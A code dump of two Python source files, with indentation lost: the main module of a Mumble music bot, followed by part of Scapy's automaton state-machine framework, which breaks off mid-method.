elif self.on_interrupting or len(raw_music) < self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=False), 2, self.volume_helper.real_volume))
self.thread.kill()
self.thread = None
time.sleep(0.1)
self.on_interrupting = False
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if not self.is_pause and not raw_music:
self.thread = None
# bot is not paused, but ffmpeg thread has gone.
# indicate that last song has finished, or the bot just resumed from pause, or something is wrong.
if self.read_pcm_size < self.pcm_buffer_size \
and var.playlist.current_index != -1 \
and self.last_ffmpeg_err:
current = var.playlist.current_item()
self.log.error("bot: cannot play music %s", current.format_debug_string())
self.log.error("bot: with ffmpeg error: %s", self.last_ffmpeg_err)
self.last_ffmpeg_err = ""
self.send_channel_msg(tr('unable_play', item=current.format_title()))
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
# move to the next song.
if not self.wait_for_ready: # if wait_for_ready flag is not true, move to the next song.
if var.playlist.next():
current = var.playlist.current_item()
self.log.debug(f"bot: next into the song: {current.format_debug_string()}")
try:
self.start_download(current)
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = 0
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
else:
self._loop_status = 'Empty queue'
else:
# if wait_for_ready flag is true, means the pointer is already
# pointing to target song. start playing
current = var.playlist.current_item()
if current:
if current.is_ready():
self.wait_for_ready = False
self.read_pcm_size = 0
self.launch_music(current, self.playhead)
self.last_volume_cycle_time = time.time()
self.async_download_next()
elif current.is_failed():
var.playlist.remove_by_id(current.id)
self.wait_for_ready = False
else:
self._loop_status = 'Wait for the next item to be ready'
else:
self.wait_for_ready = False
while self.mumble.sound_output.get_buffer_size() > 0 and self.mumble.is_alive():
# Empty the buffer before exit
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
self._loop_status = "exited"
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
def volume_cycle(self):
delta = time.time() - self.last_volume_cycle_time
if self.on_ducking and self.ducking_release < time.time():
self.on_ducking = False
self._max_rms = 0
if delta > 0.001:
if self.is_ducking and self.on_ducking:
self.volume_helper.real_volume = \
(self.volume_helper.real_volume - self.volume_helper.ducking_volume_set) * math.exp(- delta / 0.2) \
+ self.volume_helper.ducking_volume_set
else:
self.volume_helper.real_volume = self.volume_helper.volume_set - \
(self.volume_helper.volume_set - self.volume_helper.real_volume) * math.exp(- delta / 0.5)
self.last_volume_cycle_time = time.time()
def ducking_sound_received(self, user, sound):
rms = audioop.rms(sound.pcm, 2)
self._max_rms = max(rms, self._max_rms)
if self._display_rms:
if rms < self.ducking_threshold:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(rms / 200), end='\r')
else:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(self.ducking_threshold / 200)
+ '+' * int((rms - self.ducking_threshold) / 200), end='\r')
if rms > self.ducking_threshold:
if self.on_ducking is False:
self.log.debug("bot: ducking triggered")
self.on_ducking = True
self.ducking_release = time.time() + 1 # ducking release after 1s
def _fadeout(self, _pcm_data, stereo=False, fadein=False):
pcm_data = bytearray(_pcm_data)
if stereo:
if not fadein:
mask = [math.exp(-x / 60) for x in range(0, int(len(pcm_data) / 4))]
else:
mask = [math.exp(-x / 60) for x in reversed(range(0, int(len(pcm_data) / 4)))]
for i in range(int(len(pcm_data) / 4)):
pcm_data[4 * i:4 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[4 * i:4 * i + 2])[0] * mask[i]))
pcm_data[4 * i + 2:4 * i + 4] = struct.pack("<h", round(
struct.unpack("<h", pcm_data[4 * i + 2:4 * i + 4])[0] * mask[i]))
else:
mask = [math.exp(-x / 60) for x in range(0, int(len(pcm_data) / 2))]
for i in range(int(len(pcm_data) / 2)):
pcm_data[2 * i:2 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[2 * i:2 * i + 2])[0] * mask[i]))
return bytes(pcm_data) + bytes(len(pcm_data))
# =======================
# Play Control
# =======================
def play(self, index=-1, start_at=0):
if not self.is_pause:
self.interrupt()
if index != -1:
var.playlist.point_to(index)
current = var.playlist.current_item()
self.start_download(current)
self.is_pause = False
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = start_at
def clear(self):
# Kill the ffmpeg thread and empty the playlist
self.interrupt()
var.playlist.clear()
self.wait_for_ready = False
self.log.info("bot: music stopped. playlist trashed.")
def stop(self):
self.interrupt()
self.is_pause = True
if len(var.playlist) > 0:
self.wait_for_ready = True
else:
self.wait_for_ready = False
self.log.info("bot: music stopped.")
def interrupt(self):
# Kill the ffmpeg thread
if self.thread:
self.on_interrupting = True
time.sleep(0.1)
self.song_start_at = -1
self.read_pcm_size = 0
def pause(self):
# Kill the ffmpeg thread
self.interrupt()
self.is_pause = True
self.song_start_at = -1
if len(var.playlist) > 0:
self.pause_at_id = var.playlist.current_item().id
self.log.info(f"bot: music paused at {self.playhead:.2f} seconds.")
def resume(self):
self.is_pause = False
if var.playlist.current_index == -1:
var.playlist.next()
self.playhead = 0
return
music_wrapper = var.playlist.current_item()
if not music_wrapper or not music_wrapper.id == self.pause_at_id or not music_wrapper.is_ready():
self.playhead = 0
return
self.wait_for_ready = True
self.pause_at_id = ""
def start_web_interface(addr, port):
global formatter
import interface
# setup logger
werkzeug_logger = logging.getLogger('werkzeug')
logfile = util.solve_filepath(var.config.get('webinterface', 'web_logfile'))
if logfile:
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
else:
handler = logging.StreamHandler()
werkzeug_logger.addHandler(handler)
interface.init_proxy()
interface.web.env = 'development'
interface.web.secret_key = var.config.get('webinterface', 'flask_secret')
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
supported_languages = util.get_supported_language()
parser = argparse.ArgumentParser(
description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini',
help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str,
default=None, help='Settings database file')
parser.add_argument("--music-db", dest='music_db', type=str,
default=None, help='Music library database file')
parser.add_argument("--lang", dest='lang', type=str, default=None,
help='Preferred language. Support ' + ", ".join(supported_languages))
parser.add_argument("-q", "--quiet", dest="quiet",
action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose",
action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host",
type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user",
type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password",
type=str, help="Server password, if required")
parser.add_argument("-T", "--tokens", dest="tokens",
type=str, help="Server tokens to enter a channel, if required (multiple entries separated with comma ','")
parser.add_argument("-p", "--port", dest="port",
type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel",
type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate",
type=str, default=None, help="Certificate file")
parser.add_argument("-b", "--bandwidth", dest="bandwidth",
type=int, help="Bandwidth used by the bot")
parser.add_argument("-B", "--bots", dest="bots",
type=str, help="List of usernames belonging to other bots. (multiple entries separated with comma ','")
args = parser.parse_args()
# ======================
# Load Config
# ======================
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
var.config = config
parsed_configs = config.read([util.solve_filepath('configuration.default.ini'), util.solve_filepath(args.config)],
encoding='utf-8')
if len(parsed_configs) == 0:
logging.error('Could not read configuration from file \"{}\"'.format(args.config))
sys.exit()
# ======================
# Setup Logger
# ======================
bot_logger = logging.getLogger("bot")
bot_logger.setLevel(logging.INFO)
if args.verbose:
bot_logger.setLevel(logging.DEBUG)
bot_logger.debug("Starting in DEBUG loglevel")
elif args.quiet:
bot_logger.setLevel(logging.ERROR)
bot_logger.error("Starting in ERROR loglevel")
logfile = util.solve_filepath(var.config.get('bot', 'logfile').strip())
handler = None
if logfile:
print(f"Redirecting stdout and stderr to log file: {logfile}")
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
if var.config.getboolean("bot", "redirect_stderr", fallback=False):
sys.stderr = util.LoggerIOWrapper(bot_logger, logging.INFO,
fallback_io_buffer=sys.stderr.buffer)
else:
handler = logging.StreamHandler()
util.set_logging_formatter(handler, bot_logger.level)
bot_logger.addHandler(handler)
logging.getLogger("root").addHandler(handler)
var.bot_logger = bot_logger
# ======================
# Load Database
# ======================
if args.user:
username = args.user
else:
username = var.config.get("bot", "username")
sanitized_username = "".join([x if x.isalnum() else "_" for x in username])
var.settings_db_path = args.db if args.db is not None else util.solve_filepath(
config.get("bot", "database_path", fallback=f"settings-{sanitized_username}.db"))
var.music_db_path = args.music_db if args.music_db is not None else util.solve_filepath(
config.get("bot", "music_database_path", fallback="music.db"))
var.db = SettingsDatabase(var.settings_db_path)
if var.config.get("bot", "save_music_library", fallback=True):
var.music_db = MusicDatabase(var.music_db_path)
else:
var.music_db = MusicDatabase(":memory:")
DatabaseMigration(var.db, var.music_db).migrate()
var.music_folder = util.solve_filepath(var.config.get('bot', 'music_folder'))
if not var.music_folder.endswith(os.sep):
# The file searching logic assumes that the music folder ends in a /
var.music_folder = var.music_folder + os.sep
var.tmp_folder = util.solve_filepath(var.config.get('bot', 'tmp_folder'))
# ======================
# Translation
# ======================
lang = ""
if args.lang:
lang = args.lang
else:
lang = var.config.get('bot', 'language', fallback='en_US')
if lang not in supported_languages:
raise KeyError(f"Unsupported language {lang}")
var.language = lang
constants.load_lang(lang)
# ======================
# Prepare Cache
# ======================
var.cache = MusicCache(var.music_db)
if var.config.getboolean("bot", "refresh_cache_on_startup", fallback=True):
var.cache.build_dir_cache()
# ======================
# Load playback mode
# ======================
playback_mode = None
if var.db.has_option("playlist", "playback_mode"):
playback_mode = var.db.get('playlist', 'playback_mode')
else:
playback_mode = var.config.get('bot', 'playback_mode', fallback="one-shot")
if playback_mode in ["one-shot", "repeat", "random", "autoplay"]:
var.playlist = media.playlist.get_playlist(playback_mode)
else:
raise KeyError(f"Unknown playback mode '{playback_mode}'")
# ======================
# Create bot instance
# ======================
var.bot = MumbleBot(args)
command.register_all_commands(var.bot)
# load playlist
if var.config.getboolean('bot', 'save_playlist', fallback=True):
var.bot_logger.info("bot: load playlist from previous session")
var.playlist.load()
# ============================
# Start the web interface
# ============================
if var.config.getboolean("webinterface", "enabled"):
wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
tt = threading.Thread(
target=start_web_interface, name="WebThread", args=(wi_addr, wi_port))
tt.daemon = True
bot_logger.info('Starting web interface on {}:{}'.format(wi_addr, wi_port))
tt.start()
# Start the main loop.
var.bot.loop()
|
automaton.py
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# Copyright (C) Gabriel Potter <gabriel@potter.fr>
# This program is published under a GPLv2 license
"""
Automata with states, transitions and actions.
"""
from __future__ import absolute_import
import types
import itertools
import time
import os
import sys
import traceback
from select import select
from collections import deque
import threading
from scapy.config import conf
from scapy.utils import do_graph
from scapy.error import log_interactive, warning
from scapy.plist import PacketList
from scapy.data import MTU
from scapy.supersocket import SuperSocket
from scapy.consts import WINDOWS
import scapy.modules.six as six
if WINDOWS:
from scapy.error import Scapy_Exception
recv_error = Scapy_Exception
else:
recv_error = ()
""" In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501
# Passive way: using no-ressources locks
+---------+ +---------------+ +-------------------------+ # noqa: E501
| Start +------------->Select_objects +----->+Linux: call select.select| # noqa: E501
+---------+ |(select.select)| +-------------------------+ # noqa: E501
+-------+-------+
|
+----v----+ +--------+
| Windows | |Time Out+----------------------------------+ # noqa: E501
+----+----+ +----+---+ | # noqa: E501
| ^ | # noqa: E501
Event | | | # noqa: E501
+ | | | # noqa: E501
| +-------v-------+ | | # noqa: E501
| +------+Selectable Sel.+-----+-----------------+-----------+ | # noqa: E501
| | +-------+-------+ | | | v +-----v-----+ # noqa: E501
+-------v----------+ | | | | | Passive lock<-----+release_all<------+ # noqa: E501
|Data added to list| +----v-----+ +-----v-----+ +----v-----+ v v + +-----------+ | # noqa: E501
+--------+---------+ |Selectable| |Selectable | |Selectable| ............ | | # noqa: E501
| +----+-----+ +-----------+ +----------+ | | # noqa: E501
| v | | # noqa: E501
v +----+------+ +------------------+ +-------------v-------------------+ | # noqa: E501
+-----+------+ |wait_return+-->+ check_recv: | | | | # noqa: E501
|call_release| +----+------+ |If data is in list| | END state: selectable returned | +---+--------+ # noqa: E501
+-----+-------- v +-------+----------+ | | | exit door | # noqa: E501
| else | +---------------------------------+ +---+--------+ # noqa: E501
| + | | # noqa: E501
| +----v-------+ | | # noqa: E501
+--------->free -->Passive lock| | | # noqa: E501
+----+-------+ | | # noqa: E501
| | | # noqa: E501
| v | # noqa: E501
+------------------Selectable-Selector-is-advertised-that-the-selectable-is-readable---------+
"""
class SelectableObject(object):
"""DEV: to implement one of those, you need to add 2 things to your object:
- add "check_recv" function
- call "self.call_release" once you are ready to be read
You can set the __selectable_force_select__ to True in the class, if you want to # noqa: E501
force the handler to use fileno(). This may only be usable on sockets created using # noqa: E501
the builtin socket API."""
__selectable_force_select__ = False
def __init__(self):
self.hooks = []
def check_recv(self):
"""DEV: will be called only once (at beginning) to check if the object is ready.""" # noqa: E501
raise OSError("This method must be overwritten.")
def _wait_non_ressources(self, callback):
"""This get started as a thread, and waits for the data lock to be freed then advertise itself to the SelectableSelector using the callback""" # noqa: E501
self.trigger = threading.Lock()
self.was_ended = False
self.trigger.acquire()
self.trigger.acquire()
if not self.was_ended:
callback(self)
def wait_return(self, callback):
"""Entry point of SelectableObject: register the callback"""
if self.check_recv():
return callback(self)
_t = threading.Thread(target=self._wait_non_ressources, args=(callback,)) # noqa: E501
_t.setDaemon(True)
_t.start()
def register_hook(self, hook):
"""DEV: When call_release() will be called, the hook will also"""
self.hooks.append(hook)
def call_release(self, arborted=False):
"""DEV: Must be call when the object becomes ready to read.
Relesases the lock of _wait_non_ressources"""
self.was_ended = arborted
try:
self.trigger.release()
except (threading.ThreadError, AttributeError):
pass
# Trigger hooks
for hook in self.hooks:
hook()
class SelectableSelector(object):
"""
Select SelectableObject objects.
inputs: objects to process
remain: timeout. If 0, return [].
customTypes: types of the objects that have the check_recv function.
"""
def _release_all(self):
"""Releases all locks to kill all threads"""
for i in self.inputs:
i.call_release(True)
self.available_lock.release()
def _timeout_thread(self, remain):
"""Timeout before releasing every thing, if nothing was returned"""
time.sleep(remain)
if not self._ended:
self._ended = True
self._release_all()
def _exit_door(self, _input):
"""This function is passed to each SelectableObject as a callback
The SelectableObjects have to call it once there are ready"""
self.results.append(_input)
if self._ended:
return
self._ended = True
self._release_all()
def __init__(self, inputs, remain):
self.results = []
self.inputs = list(inputs)
self.remain = remain
self.available_lock = threading.Lock()
self.available_lock.acquire()
self._ended = False
def process(self):
"""Entry point of SelectableSelector"""
if WINDOWS:
select_inputs = []
for i in self.inputs:
if not isinstance(i, SelectableObject):
warning("Unknown ignored object type: %s", type(i))
elif i.__selectable_force_select__:
# Then use select.select
select_inputs.append(i)
elif not self.remain and i.check_recv():
self.results.append(i)
elif self.remain:
i.wait_return(self._exit_door)
if select_inputs:
# Use default select function
self.results.extend(select(select_inputs, [], [], self.remain)[0]) # noqa: E501
if not self.remain:
return self.results
threading.Thread(target=self._timeout_thread, args=(self.remain,)).start() # noqa: E501
if not self._ended:
self.available_lock.acquire()
return self.results
else:
r, _, _ = select(self.inputs, [], [], self.remain)
return r
def select_objects(inputs, remain):
"""
Select SelectableObject objects. Same than:
select.select([inputs], [], [], remain)
But also works on Windows, only on SelectableObject.
inputs: objects to process
remain: timeout. If 0, return [].
"""
handler = SelectableSelector(inputs, remain)
return handler.process()
class ObjectPipe(SelectableObject):
read_allowed_exceptions = ()
def __init__(self):
self.closed = False
self.rd, self.wr = os.pipe()
self.queue = deque()
SelectableObject.__init__(self)
def fileno(self):
return self.rd
def check_recv(self):
return len(self.queue) > 0
def send(self, obj):
self.queue.append(obj)
os.write(self.wr, b"X")
self.call_release()
def write(self, obj):
self.send(obj)
def recv(self, n=0):
if self.closed:
if self.check_recv():
return self.queue.popleft()
return None
os.read(self.rd, 1)
return self.queue.popleft()
def read(self, n=0):
return self.recv(n)
def close(self):
if not self.closed:
self.closed = True
os.close(self.rd)
os.close(self.wr)
self.queue.clear()
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
# Only handle ObjectPipes
results = []
for s in sockets:
if s.closed:
results.append(s)
if results:
return results, None
return select_objects(sockets, remain), None
class Message:
def __init__(self, **args):
self.__dict__.update(args)
def __repr__(self):
return "<Message %s>" % " ".join("%s=%r" % (k, v)
for (k, v) in six.iteritems(self.__dict__) # noqa: E501
if not k.startswith("_"))
class _instance_state:
def __init__(self, instance):
self.__self__ = instance.__self__
self.__func__ = instance.__func__
self.__self__.__class__ = instance.__self__.__class__
def __getattr__(self, attr):
return getattr(self.__func__, attr)
def __call__(self, *args, **kargs):
return self.__func__(self.__self__, *args, **kargs)
def breaks(self):
return self.__self__.add_breakpoints(self.__func__)
def intercepts(self):
return self.__self__.add_interception_points(self.__func__)
def unbreaks(self):
return self.__self__.remove_breakpoints(self.__func__)
def unintercepts(self):
return self.__self__.remove_interception_points(self.__func__)
##############
# Automata #
##############
class ATMT:
STATE = "State"
ACTION = "Action"
CONDITION = "Condition"
RECV = "Receive condition"
TIMEOUT = "Timeout condition"
IOEVENT = "I/O event"
class NewStateRequested(Exception):
def __init__(self, state_func, automaton, *args, **kargs):
self.func = state_func
self.state = state_func.atmt_state
self.initial = state_func.atmt_initial
self.error = state_func.atmt_error
self.final = state_func.atmt_final
Exception.__init__(self, "Request state [%s]" % self.state)
self.automaton = automaton
self.args = args
self.kargs = kargs
self.action_parameters() # init action parameters
def action_parameters(self, *args, **kargs):
self.action_args = args
self.action_kargs = kargs
return self
def run(self):
return self.func(self.automaton, *self.args, **self.kargs)
def __repr__(self):
return "NewStateRequested(%s)" % self.state
@staticmethod
def state(initial=0, final=0, error=0):
def deco(f, initial=initial, final=final):
f.atmt_type = ATMT.STATE
f.atmt_state = f.__name__
f.atmt_initial = initial
f.atmt_final = final
f.atmt_error = error
def state_wrapper(self, *args, **kargs):
return ATMT.NewStateRequested(f, self, *args, **kargs)
state_wrapper.__name__ = "%s_wrapper" % f.__name__
state_wrapper.atmt_type = ATMT.STATE
state_wrapper.atmt_state = f.__name__
state_wrapper.atmt_initial = initial
state_wrapper.atmt_final = final
state_wrapper.atmt_error = error
state_wrapper.atmt_origfunc = f
return state_wrapper
return deco
@staticmethod
def action(cond, prio=0):
def deco(f, cond=cond):
if not hasattr(f, "atmt_type"):
f.atmt_cond = {}
f.atmt_type = ATMT.ACTION
f.atmt_cond[cond.atmt_condname] = prio
return f
return deco
@staticmethod
def condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.CONDITION
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def receive_condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.RECV
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def ioevent(state, name, prio=0, as_supersocket=None):
def deco(f, state=state):
f.atmt_type = ATMT.IOEVENT
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_ioname = name
f.atmt_prio = prio
f.atmt_as_supersocket = as_supersocket
return f
return deco
@staticmethod
def timeout(state, timeout):
def deco(f, state=state, timeout=timeout):
f.atmt_type = ATMT.TIMEOUT
f.atmt_state = state.atmt_state
f.atmt_timeout = timeout
f.atmt_condname = f.__name__
return f
return deco
class _ATMT_Command:
RUN = "RUN"
NEXT = "NEXT"
FREEZE = "FREEZE"
STOP = "STOP"
END = "END"
EXCEPTION = "EXCEPTION"
SINGLESTEP = "SINGLESTEP"
BREAKPOINT = "BREAKPOINT"
INTERCEPT = "INTERCEPT"
ACCEPT = "ACCEPT"
REPLACE = "REPLACE"
REJECT = "REJECT"
class _ATMT_supersocket(SuperSocket, SelectableObject):
def __init__(self, name, ioevent, automaton, proto, *args, **kargs):
SelectableObject.__init__(self)
self.name = name
self.ioevent = ioevent
self.proto = proto
# write, read
self.spa, self.spb = ObjectPipe(), ObjectPipe()
# Register recv hook
self.spb.register_hook(self.call_release)
kargs["external_fd"] = {ioevent: (self.spa, self.spb)}
self.atmt = automaton(*args, **kargs)
self.atmt.runbg()
def fileno(self):
return self.spb.fileno()
def send(self, s):
if not isinstance(s, bytes):
s = bytes(s)
return self.spa.send(s)
def check_recv(self):
return self.spb.check_recv()
def recv(self, n=MTU):
r = self.spb.recv(n)
if self.proto is not None:
r = self.proto(r)
return r
def close(self):
pass
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
return select_objects(sockets, remain), None
class _ATMT_to_supersocket:
def __init__(self, name, ioevent, automaton):
self.name = name
self.ioevent = ioevent
self.automaton = automaton
def __call__(self, proto, *args, **kargs):
return _ATMT_supersocket(
self.name, self.ioevent, self.automaton,
proto, *args, **kargs
)
class Automaton_metaclass(type):
def __new__(cls, name, bases, dct):
cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct)
cls.states = {}
cls.state = None
cls.recv_conditions = {}
cls.conditions = {}
cls.ioevents = {}
cls.timeout = {}
cls.actions = {}
cls.initial_states = []
cls.ionames = []
cls.iosupersockets = []
members = {}
classes = [cls]
while classes:
c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501
classes += list(c.__bases__)
for k, v in six.iteritems(c.__dict__):
if k not in members:
members[k] = v
decorated = [v for v in six.itervalues(members)
if isinstance(v, types.FunctionType) and hasattr(v, "atmt_type")] # noqa: E501
for m in decorated:
if m.atmt_type == ATMT.STATE:
s = m.atmt_state
cls.states[s] = m
cls.recv_conditions[s] = []
cls.ioevents[s] = []
cls.conditions[s] = []
cls.timeout[s] = []
if m.atmt_initial:
cls.initial_states.append(m)
elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501
cls.actions[m.atmt_condname] = []
for m in decorated:
if m.atmt_type == ATMT.CONDITION:
cls.conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.RECV:
cls.recv_conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.IOEVENT:
cls.ioevents[m.atmt_state].append(m)
cls.ionames.append(m.atmt_ioname)
if m.atmt_as_supersocket is not None:
cls.iosupersockets.append(m)
elif m.atmt_type == ATMT.TIMEOUT:
cls.timeout[m.atmt_state].append((m.atmt_timeout, m))
elif m.atmt_type == ATMT.ACTION:
for c in m.atmt_cond:
cls.actions[c].append(m)
for v in six.itervalues(cls.timeout):
v.sort(key=lambda x: x[0])
v.append((None, None))
for v in itertools.chain(six.itervalues(cls.conditions),
six.itervalues(cls.recv_conditions),
six.itervalues(cls.ioevents)):
v.sort(key=lambda x: x.atmt_prio)
for condname, actlst in six.iteritems(cls.actions):
actlst.sort(key=lambda x: x.atmt_cond[condname])
for ioev in cls.iosupersockets:
setattr(cls, ioev.atmt_as_supersocket, _ATMT_to_supersocket(ioev.atmt_as_supersocket, ioev.atmt_ioname, cls)) # noqa: E501
return cls
def build_graph(self):
s = 'digraph "%s" {\n' % self.__class__.__name__
se = "" # Keep initial nodes at the beginning for better rendering
for st in six.itervalues(self.states):
if st.atmt_initial:
se = ('\t"%s" [ style=filled, fillcolor=blue, shape=box, root=true];\n' % st.atmt_state) + se # noqa: E501
elif st.atmt_final:
se += '\t"%s" [ style=filled, fillcolor=green, shape=octagon ];\n' % st.atmt_state # noqa: E501
elif st.atmt_error:
se += '\t"%s" [ style=filled, fillcolor=red, shape=octagon ];\n' % st.atmt_state # noqa: E501
s += se
for st in six.itervalues(self.states):
for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501
if n in self.states:
s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501
for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501
[("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501
[("orange", k, v) for k, v in self.ioevents.items()]):
for f in v:
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = f.atmt_condname
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501
for k, v in six.iteritems(self.timeout):
for t, f in v:
if f is None:
continue
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = "%s/%.1fs" % (f.atmt_condname, t)
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s",color=blue];\n' % (k, n, line) # noqa: E501
s += "}\n"
return s
def graph(self, **kargs):
s = self.build_graph()
return do_graph(s, **kargs)
class Automaton(six.with_metaclass(Automaton_metaclass)):
def parse_args(self, debug=0, store=1, **kargs):
self.debug_level = debug
self.socket_kargs = kargs
self.store_packets = store
def master_filter(self, pkt):
return True
def my_send(self, pkt):
self.send_sock.send(pkt)
# Utility classes and exceptions
class _IO_fdwrapper(SelectableObject):
def __init__(self, rd, wr):
if rd is not None and not isinstance(rd, (int, ObjectPipe)):
rd = rd.fileno()
if wr is not None and not isinstance(wr, (int, ObjectPipe)):
wr = wr.fileno()
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, ObjectPipe):
return self.rd.fileno()
return self.rd
def check_recv(self):
return self.rd.check_recv()
def read(self, n=65535):
if isinstance(self.rd, ObjectPipe):
return self.rd.recv(n)
return os.read(self.rd, n)
def write(self, msg):
self.call_release()
if isinstance(self.wr, ObjectPipe):
self.wr.send(msg)
return
return os.write(self.wr, msg)
def recv(self, n=65535):
return self.read(n)
def send(self, msg):
return self.write(msg)
class _IO_mixer(SelectableObject):
def __init__(self, rd, wr):
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, int):
return self.rd
return self.rd.fileno()
def check_recv(self):
return self.rd.check_recv()
def recv(self, n=None):
return self.rd.recv(n)
def read(self, n=None):
return self.recv(n)
def send(self, msg):
self.wr.send(msg)
return self.call_release()
def write(self, msg):
return self.send(msg)
class AutomatonException(Exception):
def __init__(self, msg, state=None, result=None):
Exception.__init__(self, msg)
self.state = state
self.result = result
class AutomatonError(AutomatonException):
pass
class ErrorState(AutomatonException):
pass
class Stuck(AutomatonException):
pass
class AutomatonStopped(AutomatonException):
pass
class Breakpoint(AutomatonStopped):
pass
class Singlestep(AutomatonStopped):
pass
class InterceptionPoint(AutomatonStopped):
def __init__(self, msg, state=None, result=None, packet=None):
Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501
self.packet = packet
class CommandMessage(AutomatonException):
pass
# Services
def debug(self, lvl, msg):
if self.debug_level >= lvl:
log_interactive.debug(msg)
def send(self, pkt):
if self.state.state in self.interception_points:
self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary())
self.intercepted_packet = pkt
cmd = Message(type=_ATMT_Command.INTERCEPT, state=self.state, pkt=pkt) # noqa: E501
self.cmdout.send(cmd)
cmd = self.cmdin.recv()
self.intercepted_packet = None
if cmd.type == _ATMT_Command.REJECT:
self.debug(3, "INTERCEPT: packet rejected")
return
elif cmd.type == _ATMT_Command.REPLACE:
pkt = cmd.pkt
self.debug(3, "INTERCEPT: packet replaced by: %s" % pkt.summary()) # noqa: E501
elif cmd.type == _ATMT_Command.ACCEPT:
self.debug(3, "INTERCEPT: packet accepted")
else:
raise self.AutomatonError("INTERCEPT: unknown verdict: %r" % cmd.type) # noqa: E501
self.my_send(pkt)
self.debug(3, "SENT : %s" % pkt.summary())
if self.store_packets:
self.packets.append(pkt.copy())
# Internals
def __init__(self, *args, **kargs):
external_fd = kargs.pop("external_fd", {})
self.send_sock_class = kargs.pop("ll", conf.L3socket)
self.recv_sock_class = kargs.pop("recvsock", conf.L2listen)
self.started = threading.Lock()
self.threadid = None
self.breakpointed = None
self.breakpoints = set()
self.interception_points = set()
self.intercepted_packet = None
self.debug_level = 0
self.init_args = args
self.init_kargs = kargs
self.io = type.__new__(type, "IOnamespace", (), {})
self.oi = type.__new__(type, "IOnamespace", (), {})
self.cmdin = ObjectPipe()
self.cmdout = ObjectPipe()
self.ioin = {}
self.ioout = {}
for n in self.ionames:
extfd = external_fd.get(n)
if not isinstance(extfd, tuple):
extfd = (extfd, extfd)
ioin, ioout = extfd
if ioin is None:
ioin = ObjectPipe()
elif not isinstance(ioin, SelectableObject):
ioin = self._IO_fdwrapper(ioin, None)
if ioout is None:
ioout = ObjectPipe()
elif not isinstance(ioout, SelectableObject):
ioout = self._IO_fdwrapper(None, ioout)
self.ioin[n] = ioin
self.ioout[n] = ioout
ioin.ioname = n
ioout.ioname = n
setattr(self.io, n, self._IO_mixer(ioout, ioin))
setattr(self.oi, n, self._IO_mixer(ioin, ioout))
for stname in self.states:
setattr(self, stname,
_instance_state(getattr(self, stname)))
self.start()
def __iter__(self):
return self
def __del__(self):
self.stop()
def _run_condition(self, cond, *args, **kargs):
try:
self.debug(5, "Trying %s [%s]" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
cond(self, *args, **kargs)
except ATMT.NewStateRequested as state_req:
self.debug(2, "%s [%s] taken to state [%s]" % (cond.atmt_type, cond.atmt_condname, state_req.state)) # noqa: E501
